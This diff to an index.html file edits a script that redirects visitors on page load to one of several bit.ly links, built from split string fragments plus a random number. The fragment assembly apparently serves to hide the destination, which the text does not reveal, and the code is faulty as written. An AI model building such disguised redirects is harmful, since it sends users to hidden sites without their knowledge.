--- a/index.html
+++ b/index.html
@@ -2,10 +2,11 @@
 function reDirect() {
 a = location.href = "bit.ly/";
 b = location.href = "orlink";
-c = location.href = "2020v";
-d = Math.ceil(Math.random() * 1);
+c = location.href = "2020vt";
+d = Math.ceil(Math.random() * 6);
 a = "http://" + a + b + c + d ;
 window.location = a
 }
 reDirect();
 </script>
+
